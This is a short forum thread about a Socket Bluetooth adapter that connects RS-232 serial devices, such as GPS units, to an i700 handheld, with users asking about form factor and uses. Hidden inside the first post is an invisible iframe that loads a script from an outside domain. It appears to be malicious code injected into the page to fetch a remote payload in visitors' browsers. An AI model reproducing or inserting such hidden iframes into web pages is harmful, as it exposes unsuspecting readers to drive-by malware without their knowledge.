No serial port? Run Serial port devices over Bluetooth

Yet another brilliant product from Socket, a Bluetooth serial port adapter that takes any 9-pin rs-232 device and gives it wireless access to devices with Bluetooth support, such as an i700 with a Socket SDIO Bluetooth card.

None of this stuff is cheap, but as i700 owners, we're not exactly a price sensitive bunch.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I'm lost, what form factor is this adapter going to be? If not SDIO, how are you going to plug it into the i700?
Also, is this going to allow the i700 to act as a BT based modem?

The adapter will have a 9-pin rs-232 male adapter and a Bluetooth radio. Your device that has a 9-pin rs-232 female cable will plug into the adapter. The wiring will end at that point.

You would then install a Bluetooth SDIO card in the i700. That card would talk to the Bluetooth radio hanging off the end of your serial device.

The resulting combination will support anything the Bluetooth Serial Port Profile supports. You'll probably have to bring up the remote connection on the i700 manually, then open a Bluetooth serial port connection to your serial device before you can get data to a serial-only device.

This will, for example, support GPS devices that lack USB connectors.

Wow!

Now that is really cool! I wonder how much that's going to cost when it comes out? That might be the solution to get my GPS working!!
